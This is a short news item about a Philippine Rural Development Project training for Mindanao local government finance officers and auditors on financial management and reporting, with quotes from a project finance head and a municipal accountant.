With the implementation of various PRDP subprojects in full gear, the Philippine Rural Development Project (PRDP) trained last month participating local government units (LGUs) in Mindanao on financial management.

The training was aimed at providing guidance on financial management essentials in implementing, accounting for, and reporting on the operations of PRDP. Participants composed of finance officers and auditors of LGUs, which have approved or ongoing subprojects.

“It is also equally important that participating LGUs understand the World Bank guidelines in monitoring the progress and status of the Project,” said Edgardo Aure, LGU Finance Head of PRDP National Project Coordination Office (NPCO).

He added that there should be a common understanding among Project implementers in all levels, regulatory and oversight agencies, on the financial management “especially LGUs who directly implement the Project”.

“With this training, they will be guided in having accurate, truthful and reliable reports, since the project is time-bound,” he said.

Aure added that LGUs also need to strengthen its procurement guidelines since it is interdependent with the Project’s financial management guidelines.

“This is and opportunity for us to learn the prescribed reporting guidelines under PRDP since we need to submit real time. The earlier we submit reports, access to availability of funds would be easier,” said Elvima Marie Tan, Municipal Accountant of LGU Salay.

Tan added that more capacity building activities should be conducted with the LGUs particularly on planning since PRDP is focused on commodity-based investments.
